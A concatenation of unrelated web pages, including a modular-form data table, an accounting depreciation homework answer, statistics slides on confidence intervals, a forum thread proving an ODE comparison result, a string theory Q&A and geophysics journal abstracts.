1.2  0.239123  −0.760877  0  −1.42107  3.18194  0  0  2.60301  0  −2.42107
1.3  2.46050  1.46050  0  0.133074  −0.593579  0  0  −2.72665  0  −0.866926

Atkin-Lehner signs

$$p$$  Sign
$$3$$  $$-1$$
$$7$$  $$-1$$

Inner twists

This newform does not admit any (nontrivial) inner twists.

Twists

By twisting character orbit (Char, Parity, Ord, Mult, Type, Twist, Min, Dim):
1.a even 1 1 trivial 1323.2.a.y 3
3.b odd 2 1 1323.2.a.z 3
7.b odd 2 1 1323.2.a.x 3
7.d odd 6 2 189.2.e.f yes 6
21.c even 2 1 1323.2.a.ba 3
21.g even 6 2 189.2.e.e 6
63.i even 6 2 567.2.h.i 6
63.k odd 6 2 567.2.g.i 6
63.s even 6 2 567.2.g.h 6
63.t odd 6 2 567.2.h.h 6

By twisted newform orbit (Twist, Min, Dim, Char, Parity, Ord, Mult, Type):
189.2.e.e 6 21.g even 6 2
189.2.e.f yes 6 7.d odd 6 2
567.2.g.h 6 63.s even 6 2
567.2.g.i 6 63.k odd 6 2
567.2.h.h 6 63.t odd 6 2
567.2.h.i 6 63.i even 6 2
1323.2.a.x 3 7.b odd 2 1
1323.2.a.y 3 1.a even 1 1 trivial
1323.2.a.z 3 3.b odd 2 1
1323.2.a.ba 3 21.c even 2 1

Hecke kernels

This newform subspace can be constructed as the intersection of the kernels of the following linear operators acting on $$S_{2}^{\mathrm{new}}(\Gamma_0(1323))$$: $$T_{2}^{3} + 2 T_{2}^{2} - 3 T_{2} - 3$$, $$T_{5}^{3} - T_{5}^{2} - 6 T_{5} - 3$$, $$T_{13}^{3} + 2 T_{13}^{2} - 19 T_{13} - 47$$.

Hecke characteristic polynomials

$p$: $F_p(T)$
$2$: $$-3 - 3 T + 2 T^{2} + T^{3}$$
$3$: $$T^{3}$$
$5$: $$-3 - 6 T - T^{2} + T^{3}$$
$7$: $$T^{3}$$
$11$: $$3 + 12 T + 7 T^{2} + T^{3}$$
$13$: $$-47 - 19 T + 2 T^{2} + T^{3}$$
$17$: $$-9 - 33 T + T^{3}$$
$19$: $$-29 - 4 T + 5 T^{2} + T^{3}$$
$23$: $$-9 + 3 T + 6 T^{2} + T^{3}$$
$29$: $$9 + 30 T + 13 T^{2} + T^{3}$$
$31$: $$69 + T - 8 T^{2} + T^{3}$$
$37$: $$-93 - 5 T + 8 T^{2} + T^{3}$$
$41$: $$387 - 105 T - 2 T^{2} + T^{3}$$
$43$: $$-101 - 12 T + 9 T^{2} + T^{3}$$
$47$: $$-9 - 42 T - 9 T^{2} + T^{3}$$
$53$: $$243 + 165 T + 24 T^{2} + T^{3}$$
$59$: $$81 + 66 T + 15 T^{2} + T^{3}$$
$61$: $$121 - 49 T - T^{2} + T^{3}$$
$67$: $$-31 + 53 T - 14 T^{2} + T^{3}$$
$71$: $$-243 - 108 T - 3 T^{2} + T^{3}$$
$73$: $$-981 - 134 T + 7 T^{2} + T^{3}$$
$79$: $$127 - 69 T - 6 T^{2} + T^{3}$$
$83$: $$-729 - 180 T - 3 T^{2} + T^{3}$$
$89$: $$-489 - 93 T + 5 T^{2} + T^{3}$$
$97$: $$24 + 16 T - 14 T^{2} + T^{3}$$
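The embeddings table can be sanity-checked numerically from the defining polynomial and the q-expansion coefficients; a small sketch (my own verification script, not an LMFDB tool):

```python
import numpy as np

# Real roots of the defining polynomial x^3 - x^2 - 4x + 1.
nus = np.sort(np.roots([1, -1, -4, 1]).real)

for nu in nus:
    beta1, beta2 = nu, nu**2 - nu - 3   # basis from the table above
    a2 = -1 + beta1                     # coefficients read off f(q)
    a4 = 2 - beta1 + beta2
    a5 = -beta2
    a8 = -4 + beta1 - 2 * beta2
    print(f"nu={nu:+.5f}  a2={a2:+.5f}  a4={a4:+.5f}  a5={a5:+.5f}  a8={a8:+.5f}")
# The row nu=-1.69963 reproduces a2=-2.69963, a4=+5.28799, a5=-1.58836, a8=-8.87636.
```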
2021-01-24 19:06:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9741399884223938, "perplexity": 4496.428675371205}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703550617.50/warc/CC-MAIN-20210124173052-20210124203052-00600.warc.gz"}
https://www.transtutors.com/questions/depreciation-method-double-declining-balance-and-150-declining-balance-461290.htm
# Depreciation Method - Double Declining Balance and 150%-Declining Balance 1 answer below »

P11-1 Depreciation Method. The Winsey Company purchased equipment on January 2, 2010, for $700,000. The equipment has the following characteristics: estimated service life 20 years (100,000 hours; 950,000 units of output); estimated residual value $50,000. During 2010 and 2011, the company used the machine for 4,500 and 5,500 hours respectively and produced 40,000 and 60,000 units respectively. Compute the depreciation for 2010 and 2011 under each of the following methods: 5. Double-declining-balance. 6. 150%-declining-balance. 7. Compute the company's return on assets (net income divided by average total assets, as discussed in Chapter 6) for each method for 2010 and 2011, assuming that income before depreciation is $100,000. For simplicity, use ending assets, and ignore interest, income taxes, and other assets.

## 1 Approved Answer

kotla s

1.) Straight-line: ($700,000 - $50,000) / 20 years = $32,500 per year. Depreciation: 2010, $32,500; 2011, $32,500.
2.) Hours worked: ($700,000 - $50,000) / 100,000 hours = $6.50 per hour. Depreciation: 2010 = $6.50 x 4,500 hours = $29,250; 2011 = $6.50 x 5,500 hours = $35,750.
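The two declining-balance methods the question actually asks for follow one pattern: rate = factor / life, applied each year to the beginning book value. A sketch of that arithmetic in Python, under the usual textbook assumption that the residual value is ignored until book value would fall below it (not an issue in the first two years here):

```python
def declining_balance(cost, life_years, factor, years):
    """Yearly declining-balance depreciation with rate = factor / life."""
    rate = factor / life_years
    book = cost
    schedule = []
    for _ in range(years):
        dep = book * rate      # depreciation on beginning book value
        schedule.append(dep)
        book -= dep
    return schedule

cost, life = 700_000, 20
print(declining_balance(cost, life, 2.0, 2))  # DDB:  [70000.0, 63000.0]
print(declining_balance(cost, life, 1.5, 2))  # 150%: [52500.0, 48562.5]
```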
2021-09-28 23:02:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.36670172214508057, "perplexity": 4966.150893880986}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780060908.47/warc/CC-MAIN-20210928214438-20210929004438-00666.warc.gz"}
http://slideplayer.com/slide/4129180/
# Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion. ## Presentation on theme: "Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion."— Presentation transcript: Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion INFERENTIAL STATISTICS This chapter presents the beginnings of inferential statistics. The two major applications of inferential statistics involve the use of sample data to: 1.estimate the value of a population parameter, and 2.test some claim (or hypothesis) about a population. INFERENTIAL STATISTICS (CONTINUED) This chapter deals with the first of these. 1.We introduce methods for estimating values of these important population parameters: proportions, means, and variances. 2.We also present methods for determining sample sizes necessary to estimate those parameters. DEFINITIONS Estimator is a formula or process for using sample data to estimate a population parameter. Estimate is a specific value or range of values used to approximate a population parameter. Point estimate is a single value (or point) used to approximate a population parameter. ASSUMPTIONS FOR ESTIMATING A PROPORTION We begin this chapter by estimating a population proportion. We make the following assumptions: 1.The sample is simple random. 2.The conditions for the binomial distribution are satisfied. (See Section 5-3.) 3.There are at least 5 successes and 5 failures. NOTATION FOR PROPORTIONS p =population proportion sample proportion of x successes in a sample of size n. sample proportion of failures in a sample of size n. POINT ESTIMATE A point estimate is a single value (or point) used to approximate a population parameter. CONFIDENCE INTERVALS A confidence interval (or interval estimate) is a range (or an interval) of values used to estimate the true value of a population parameter. A confidence interval is sometimes abbreviated as CI. CONFIDENCE LEVEL A confidence level is the probability 1 − α (often expressed as the equivalent percentage value) that the confidence interval actually does contain the population parameter, assuming that the estimation process is repeated a large number of times. (The confidence level is also called the degree of confidence, or the confidence coefficient.) Some common confidence levels are: 90%,95%, or99% (α = 10%)(α = 5%)(α = 1%) A REMARK ABOUT CONFIDENCE INTERVALS Do not use the overlapping of confidence intervals as the basis for making final conclusions about the equality of proportions. CRITICAL VALUES 1.Under certain conditions, the sampling distribution of sample proportions can be approximated by a normal distribution. (See Figure 7-2.) 2.A z score associated with a sample proportion has a probability of α/2 of falling in the right tail of Figure 7-2. 3.The z score separating the right-tail is commonly denoted by z α/2, and is referred to as a critical value because it is on the borderline separating z scores that are likely to occur from those that are unlikely to occur. z = 0 Figure 7-2 Found from Table A-2. (corresponds to an area of 1 − α/2.) −z α/2 z α/2 α/2 CRITICAL VALUE A critical value is the number on the borderline separating sample statistics that are likely to occur from those that are unlikely to occur. The number z α/2 is a critical value that is a z score with the property that it separates an area of α/2 in the right tail of the standard normal distribution. (See Figure 7-2). 
NOTATION FOR CRITICAL VALUE. The critical value z_{α/2} is the positive z value that is at the vertical boundary separating an area of α/2 in the right tail of the standard normal distribution. (The value of −z_{α/2} is at the vertical boundary for the area of α/2 in the left tail.) The subscript α/2 is simply a reminder that the z score separates an area of α/2 in the right tail of the standard normal distribution.

FINDING z_{α/2} FOR A 95% DEGREE OF CONFIDENCE. For a 95% confidence level, α = 5% = 0.05 and α/2 = 2.5% = 0.025; the critical values are −z_{α/2} = −1.96 and z_{α/2} = 1.96.

MARGIN OF ERROR. The margin of error of the estimate for p is E = z_{α/2} · √(p̂q̂/n). NOTE: n is the size of the sample.

CONFIDENCE INTERVAL FOR THE POPULATION PROPORTION p: p̂ − E < p < p̂ + E.

ROUND-OFF RULE FOR CONFIDENCE INTERVALS. Round the confidence interval limits to three significant digits.

PROCEDURE FOR CONSTRUCTING A CONFIDENCE INTERVAL. CONFIDENCE INTERVAL LIMITS: the limits are p̂ − E and p̂ + E.

FINDING A CONFIDENCE INTERVAL USING TI-83/84. 1. Select STAT. 2. Arrow right to TESTS. 3. Select A:1–PropZInt…. 4. Enter the number of successes as x. 5. Enter the size of the sample as n. 6. Enter the Confidence Level. 7. Arrow down to Calculate and press ENTER. NOTE: If the proportion is given, you must first compute the number of successes by multiplying the proportion (as a decimal) by the sample size. You must round to the nearest integer.

SAMPLE SIZES FOR ESTIMATING A PROPORTION p. When an estimate p̂ is known: n = [z_{α/2}]² p̂q̂ / E². When no estimate p̂ is known: n = [z_{α/2}]² · 0.25 / E².

ROUND-OFF RULE FOR DETERMINING SAMPLE SIZE. In order to ensure that the required sample size is at least as large as it should be, if the computed sample size is not a whole number, round up to the next higher whole number.

FINDING THE POINT ESTIMATE AND E FROM A CONFIDENCE INTERVAL. Point estimate of p: p̂ = (upper confidence limit + lower confidence limit) / 2. Margin of error: E = (upper confidence limit − lower confidence limit) / 2.

CAUTION. Do not use the overlapping of confidence intervals as the basis for making final conclusions about the equality of proportions.
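The interval produced by 1-PropZInt is just the formula above; a small Python sketch using SciPy (the function name and example counts are my own, arbitrary choices):

```python
from math import sqrt
from scipy.stats import norm

def prop_z_interval(x, n, confidence=0.95):
    """Confidence interval p-hat +/- z_(alpha/2) * sqrt(p-hat * q-hat / n)."""
    p_hat = x / n
    z = norm.ppf(1 - (1 - confidence) / 2)   # critical value z_(alpha/2)
    e = z * sqrt(p_hat * (1 - p_hat) / n)    # margin of error E
    return p_hat - e, p_hat + e

# Example: 400 successes in 1000 trials at 95% confidence.
print(prop_z_interval(400, 1000))  # roughly (0.370, 0.430)
```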
2017-11-20 01:17:12
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8249815106391907, "perplexity": 993.8751934473215}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934805881.65/warc/CC-MAIN-20171119234824-20171120014824-00547.warc.gz"}
https://www.physicsforums.com/threads/proving-that-one-solution-always-lies-above-the-other.713993/
# Proving that one solution always lies above the other ## Main Question or Discussion Point Hi all, I'd be very happy if you could help me solve a problem in my research. I need to prove the following: $H'(r) = -y(r) - k H(r)$ k is a constant. y is strictly increasing, but not continuous. Let $(a,b]\subset R$. $(H_x, y_x)$ denotes solution x. $H_1(a)<H_0(a)<0$. $H_0(s)<0, H_1(s)<0$ for all $s\in(a,b]$. $y_1(s)>y_0(s)$ for all $s \in (a,b]$. Show: $H_1(r)<H_0(r)$ for all $r \in (a,b]$. Related Differential Equations News on Phys.org pasmith Homework Helper Hi all, I'd be very happy if you could help me solve a problem in my research. I need to prove the following: $H'(r) = -y(r) - k H(r)$ k is a constant. y is strictly increasing, but not continuous. Let $(a,b]\subset R$. $(H_x, y_x)$ denotes solution x. $H_1(a)<H_0(a)<0$. $H_0(s)<0, H_1(s)<0$ for all $s\in(a,b]$. $y_1(s)>y_0(s)$ for all $s \in (a,b]$. Show: $H_1(r)<H_0(r)$ for all $r \in (a,b]$. Starting from $$H_0' + kH_0 = - y_0 \\ H_1' + kH_1 = -y_1$$ if we subtract the second from the first we obtain $$(H_0 - H_1)' + k(H_0 - H_1) = y_1 - y_0$$ and if we multiply by $e^{kr}$ we find that $$\frac{d}{dr} \left(e^{kr} (H_0 - H_1) \right) = e^{kr}(y_1 - y_0)$$ Now the right hand side is strictly positive for all $r \in (a,b]$, and so $e^{kr}(H_0 - H_1)$ is strictly increasing on $(a,b]$. Since it is initially strictly positive ($H_0(a) > H_1(a)$), it therefore remains strictly positive. It follows that $H_0(r) > H_1(r)$ for all $r \in (a,b]$ as required. Thanks a lot! That was a very elegant explanation :) Now, can I prove the same for: $H'(r)=-y(r)-H(r) k(-H(r))$ , where k is a strictly increasing positive function? Last edited: pasmith Homework Helper Thanks a lot! That was a very elegant explanation :) Now, can I prove the same for: $H'(r)=-y(r)-H(r) k(-H(r))$ , where k is a strictly increasing positive function? Yes, assuming that continuous solutions of the now non-linear ODEs exist on $[a,b]$. Starting from the same point as before, we obtain $$(H_0 - H_1)' + k(-H_0)H_0 - k(-H_1)H_1 = y_1 - y_0$$ Now $k(-H_0)H_0 - k(-H_1)H_1$ is not obviously $\frac{f'(r)}{f(r)}(H_0 - H_1)$ for some strictly positive $f(r)$, so we can't use the previous method. However, we can use a different idea. Suppose there exists $r_0 \in (a,b]$ such that $H_0(r_0) = H_1(r_0)$. It then follows, under the assumptions of the previous problem, that $$(H_0 - H_1)'(r_0) = y_1(r_0) - y_0(r_0) > 0$$ which means that at that point $H_0 - H_1$ is strictly increasing. Thus locally $H_0(r) < H_1(r)$ if $r < r_0$ and $H_0(r) > H_1(r)$ if $r > r_0$. It follows that there exists at most one such $r_0 \in (a,b]$, since once $H_0 > H_1$ the solutions can't intersect again in that interval; if they did then at that point $(H_0 - H_1)'$ would not be strictly positive, which is impossible. Thus if $H_0(a) > H_1(a)$ then again it must follow that $H_0(r) > H_1(r)$ for all $r \in (a,b]$. Last edited: Beautiful solution, once again :) I was wondering, whether the fact that y is not necessarily continuous matters. Can I speak about $(H_0-H_1)'(r_0)$ and $y_0(r_0)-y_1(r_0)$? Or do I need to deal with $(H_0-H_1)'(r\rightarrow r_0^-)$. And then, can I claim $y_0(\rightarrow r_0^-)-y_1(r\rightarrow r_0^-)>0$? I think I can, since $y_0(r_0)-y_1(r_0)>0$ everywhere... But I'm not sure how to write that formally. pasmith Homework Helper Beautiful solution, once again :) I was wondering, whether the fact that y is not necessarily continuous matters. 
pasmith (Homework Helper): How badly behaved are the functions you are considering? If y is at least piecewise continuous, then the above arguments will hold on each subinterval on which y is continuous. I think there are also constraints on y in order for H to exist in the first place.

pasmith (Homework Helper): On closer inspection, it appears that if $y_1 - y_0$ and $k$ are not continuous, then we can't necessarily show that $H_0 > H_1$. We want to use the sign of $(H_0 - H_1)'$ to show that if $(H_0 - H_1)(r_0) = 0$ then $H_0 - H_1$ is strictly increasing in an open neighborhood of $r_0$. That is enough for us to conclude that if $H_0 - H_1$ is initially strictly positive then it remains strictly positive. More formally, we want to show that there exists $\epsilon > 0$ such that if $|r - r_0| < \epsilon$ then $(H_0 - H_1)'(r) > 0$. Then, by the mean value theorem, $H_0 - H_1$ will be strictly increasing on that interval. It is not necessary for the application of the mean value theorem that $(H_0 - H_1)'$ be continuous. We do, however, need continuity, or at least suitable limiting behaviour, at $r_0$ in order to show that a suitable $\epsilon > 0$ exists.

Now if $(H_0 - H_1)'$ is continuous at $r_0$ then, since it is strictly positive at $r_0$, it follows that such an $\epsilon$ exists. However, if $(H_0 - H_1)'$ is not continuous at $r_0$ but $$\lim_{r \to r_0^{+}} (H_0 - H_1)'(r) = \lim_{r \to r_0^{+}} (y_1 - y_0)(r) > 0$$ and $$\lim_{r \to r_0^{-}} (H_0 - H_1)'(r) = \lim_{r \to r_0^{-}} (y_1 - y_0)(r) > 0,$$ then that again guarantees the existence of such an $\epsilon$. (I am assuming here that $$\lim_{r \to r_0} \left(k(-H_0)H_0 - k(-H_1)H_1\right)(r) = 0,$$ and if that is not the case then the limits of $(H_0 - H_1)'$ and $y_1 - y_0$ are not equal, and I don't see how to make further progress.) But the most that the condition $y_1(r) > y_0(r)$ gives us is that $$\lim_{r \to r_0^{+}} (y_1 - y_0)(r) \geq 0 \quad\text{and}\quad \lim_{r \to r_0^{-}} (y_1 - y_0)(r) \geq 0,$$ if those limits actually exist. If one of those limits is zero, then it might be that $(H_0 - H_1)'$ approaches zero only through negative values, and if one of those limits doesn't exist then we can't say anything at all.

Well, we know that $y_1(r)>y_0(r)$ for all r. If y is defined for all r, isn't it necessarily piecewise continuous? k, at any rate, is continuous. It seems to me that there has to be a neighborhood to the left of $r_0$ in which $y_1(r)-y_0(r)>k(-H_0)H_0-k(-H_1)H_1$...

pasmith (Homework Helper): In general, no. But since y is constrained to be strictly increasing, it follows that the only discontinuities it can have are jump discontinuities, and there can only be a countable number of them. It follows that the only discontinuities $y_1 - y_0$ can have are jump discontinuities, and there can only be a countable number of them. It also follows that the necessary one-sided limits exist. Since k is continuous, my approach should work. As for the claim that there has to be a neighborhood to the left of $r_0$ in which $y_1(r)-y_0(r)>k(-H_0)H_0-k(-H_1)H_1$: I'm not convinced that this is necessarily the case.
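A quick numerical illustration of the comparison argument discussed in this thread (not a proof, and not from the thread itself; the particular $k$, forcing functions and initial values below are invented for the demo, with $y_1$ given a jump discontinuity to echo the discussion):

```python
# Integrate H' = -y(r) - k*H(r) for two forcing functions with y1 > y0
# on (a, b] and H1(a) < H0(a) < 0, then check that H0 - H1 stays positive.
import numpy as np
from scipy.integrate import solve_ivp

a, b, k = 0.0, 2.0, 0.8

def y0_fun(r):
    return r                       # strictly increasing, continuous

def y1_fun(r):
    return r + 0.5 + (r > 1.0)     # strictly increasing, jump at r = 1

sol0 = solve_ivp(lambda r, H: -y0_fun(r) - k * H, (a, b), [-1.0], max_step=1e-3)
sol1 = solve_ivp(lambda r, H: -y1_fun(r) - k * H, (a, b), [-2.0], max_step=1e-3)

H0 = np.interp(sol1.t, sol0.t, sol0.y[0])   # put both solutions on one grid
print("min of H0 - H1 on (a, b]:", np.min(H0 - sol1.y[0]))  # stays > 0
```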
https://phys.libretexts.org/Courses/University_of_California_Davis/UCD%3A_Physics_9HA__Classical_Mechanics/00%3A_Front_Matter/01%3A_TitlePage
# TitlePage

UCD: Physics 9HA – Classical Mechanics
http://physics.stackexchange.com/questions/64306/spectra-of-the-type-ii-string-theories
# Spectra of the Type II String theories

The spectrum of the Type II string theory (both IIA and IIB) is given by:

$$\begin{array}{|c|c|c|}
\hline
\text{Sector} & \text{Spectrum} & \text{Massless fields} \\ \hline
\text{R--R} & \mathbf{8}_s \otimes \mathbf{8}_s & C_0, C_1, C_2, C_3, C_4, \ldots \\ \hline
\text{NS--NS} & \mathbf{8}_v \otimes \mathbf{8}_v & g_{\mu\nu}, B_{\mu\nu}, \Phi, \ldots \\ \hline
\text{R--NS} & \mathbf{8}_s \otimes \mathbf{8}_v & \Psi'_\mu, \lambda', \ldots \\ \hline
\text{NS--R} & \mathbf{8}_v \otimes \mathbf{8}_s & \Psi_\mu, \lambda, \ldots \\ \hline
\end{array}$$

I know that for the Ramond-Ramond fields, the even ones belong to the Type IIB string theory and the odd ones belong to the Type IIA string theory. But what about the rest? Are they there in both Type II string theories? I think it should be the case, because the choice of the GSO projection is only for the R-R sector.

Answer: The NS-NS sector is the same in type IIA and IIB, but the R-NS and NS-R sectors differ. The type IIA theory is non-chiral, so the R-NS and NS-R fields transform in $\mathbf{8}_s \otimes \mathbf{8}_v$ and $\mathbf{8}_v \otimes \mathbf{8}_s'$, where $\mathbf{8}_s$ and $\mathbf{8}_s'$ are the two eight-dimensional spinor representations of $SO(8)$. Type IIB, on the other hand, is a chiral theory where the R-NS and NS-R fields are constructed from the same spinor representation, so $\mathbf{8}_s \otimes \mathbf{8}_v$ and $\mathbf{8}_v \otimes \mathbf{8}_s$. Similarly, the R-R sector of IIA is given by $\mathbf{8}_s \otimes \mathbf{8}_s'$, while in the IIB case it is given by $\mathbf{8}_s \otimes \mathbf{8}_s$.
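For reference, the massless field content in the table follows from the standard decomposition of these $SO(8)$ little-group tensor products (a textbook result, quoted here as a sketch):

$$\mathbf{8}_v \otimes \mathbf{8}_v = \mathbf{1} \oplus \mathbf{28} \oplus \mathbf{35}_v, \qquad \mathbf{8}_s \otimes \mathbf{8}_s = \mathbf{1} \oplus \mathbf{28} \oplus \mathbf{35}_s, \qquad \mathbf{8}_s \otimes \mathbf{8}_{s'} = \mathbf{8}_v \oplus \mathbf{56}_t,$$

where the NS-NS product gives the dilaton $\Phi$, the two-form $B_{\mu\nu}$ and the graviton $g_{\mu\nu}$; the same-chirality R-R product (IIB) gives $C_0$, $C_2$ and the self-dual $C_4$; and the opposite-chirality R-R product (IIA) gives $C_1$ and $C_3$.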
https://zbmath.org/?q=ut%3Askew+incidence
https://www.x-mol.com/paper/geo/tag/128/journal/71643
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-13 Xinyou Zhang, Lin Liu, Yajuan Song

Abstract: The long-term trend and seasonal variability of sea surface temperature (SST) over the tropical Indo-Pacific region under the global warming projection simulated by the FIO-ESM model are analyzed. At the seasonal time scale, the significant warming trend over the Indo-Pacific warm pool region is well captured by the FIO-ESM model under the RCP8.5 scenario. A La Niña-like warming pattern dominates in the tropical Pacific, while a negative Indian Ocean Dipole warming pattern takes place in the Indian Ocean under the global warming projection. The strength of the SST warming trend is found to be seasonally dependent over the Indo-Pacific region. The spatial distribution of the calendar month in which the fastest/slowest SST warming takes place in the tropical Indo-Pacific has been assessed in the FIO-ESM simulation; it corresponds closely with the distribution of the SST climatology in the Pacific but not in the Indian Ocean.

Updated: 2020-02-13

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-13 Vimlesh Pant, Kumar Ravi Prakash

Abstract: A coupled ocean–atmosphere–wave model was used to assess the impact of model coupling on the simulations of air–sea fluxes, surface currents, waves, and the temperature profile during the passage of tropical cyclone (TC) Phailin in the Bay of Bengal. Four numerical experiments with different coupling configurations among the atmosphere, ocean, and wave models were carried out to identify differences in the simulated atmospheric and oceanic parameters. The simulated track and intensity of Phailin agree well with the observations. The inter-comparison of model experiments with different coupling options highlights the importance of better air–sea fluxes in the coupled model, as compared to the uncoupled model, for improving the simulation of TC Phailin. The coupled model configurations overcome the cold bias (up to −2 °C) in sea surface temperature simulated by the uncoupled ocean model. A higher magnitude of the surface drag coefficient in the uncoupled atmosphere model enhanced the bottom stress (> 2 N m−2). As a result of excess momentum transfer to the sea surface, the uncoupled ocean model produced stronger surface currents than the coupled model. The inclusion of the wave model increases the sea surface roughness and thereby improves the wind speed and momentum flux at the air–sea interface. The maximum significant wave height in the coupled model was about 2 m lower than in the uncoupled wave model. The model experiments demonstrate that the periodic feedback among the atmosphere, ocean, and wave models leads to a better representation of momentum and heat fluxes, which improves the prediction of a tropical cyclone.

Updated: 2020-02-13

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-13 Yunus Levent Ekinci, Aydin Büyüksaraç, Özcan Bektaş, Can Ertekin

Abstract: The Quaternary Mount Nemrut stratovolcano, with its spectacular summit caldera and associated lakes, is located north of the Bitlis–Zagros suture zone, Eastern Turkey. Although much attention has been paid to its geology, morphology, history and biology, a detailed geophysical investigation had not been performed in this special region. Thus, we attempted to characterize the stratovolcano and its surroundings using total-field aeromagnetic anomalies. Potential-field data-processing techniques helped us to interpret the geologic sources causing the magnetic signatures. Resulting image maps obtained from some linear transformations and a derivative-based technique revealed general compatibility between the aeromagnetic anomalies and the near-surface geology of the study area. Some high-amplitude magnetic anomalies observed north of the Nemrut caldera rim are associated with the latest bimodal volcanic activity, marked by lava fountains and comenditic-basaltic flows that occurred along the rift zone. After minimizing the high-frequency effects, a pseudogravity-based three-dimensional inversion scheme revealed that the shallowest deep-seated sources are located about 3.0 km below the ground surface. Two-dimensional normalized full gradient solutions also exposed the depths of these anomaly sources, in good agreement with the inversion results. This first geophysical study performed with aeromagnetic anomalies clearly gave insights into the main magnetized structures of the Mount Nemrut stratovolcano.

Updated: 2020-02-13

• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-13 Luxman Kumar, J. P. Narayan

Abstract: This paper presents a scenario for the spatial variation of the fundamental frequency of the sediment deposits above the basement and the corresponding amplification, as well as the average spectral amplification in different frequency bandwidths, for the National Capital Territory Delhi (the capital of India). The exposed central quartzite ridge and the Yamuna River channel are responsible for very large spatial variations of the fundamental frequency in the eastern part of the National Capital Territory Delhi. At 20% of the considered sites, a good match is obtained between the fundamental frequency computed numerically using available S-wave velocities to a certain depth (and their extrapolation) and that obtained experimentally. The computed fundamental and dominant frequencies reveal that both medium-rise (5–10 storey) and high-rise (> 10 storey) buildings in the western part, as well as medium-rise buildings in the localities east of or very near the Yamuna River, may suffer heavy to very heavy damage due to the occurrence of the double resonance phenomenon. Furthermore, 1–2-storey buildings on the weathered exposed quartzite rock may also suffer heavy damage during local earthquakes because of the occurrence of double resonance. The possible reasons behind the lack of earthquake damage to the Qutab Minar, the tallest brick masonry minaret in the world, over the last 800 years may be the nonoccurrence of double resonance and almost no amplification in the low frequency range. There are two localities in the western part of the National Capital Territory Delhi, namely Kanganheri-Chhawla and Buradi, wherein all sorts of buildings are highly vulnerable to earthquake damage. For the closed Chhatarpur Basin and a semiclosed basin to its northeast, formed by exposed quartzite rock, three-dimensional (3D) simulations are required to predict the characteristics of basin-generated surface waves and their focusing effects in the Chhatarpur Basin. The average spectral amplification map developed for the 0–10 Hz bandwidth depicts a range of 2.25–4.82 in the National Capital Territory Delhi and may be directly used to transfer the estimated seismic hazard at the basement to the free surface.

Updated: 2020-02-13
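As background to the fundamental-frequency mapping in the abstract above: for the idealized case of a single soft layer of thickness $H$ and shear-wave velocity $V_s$ over rigid bedrock (a simplification of the paper's multi-layer setting), the standard quarter-wavelength estimate is

$$f_0 = \frac{V_s}{4H},$$

so, for example, a 50-m-thick deposit with $V_s = 200$ m/s resonates near $f_0 = 1$ Hz; "double resonance" then refers to this site frequency coinciding with a building's natural frequency.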
• Pure Appl. Geophys. (IF 1.466) Pub Date: 2020-02-13 Mohamed Salah Boussaid, Céline Mallet, Kévin Beck, Jodry Clara

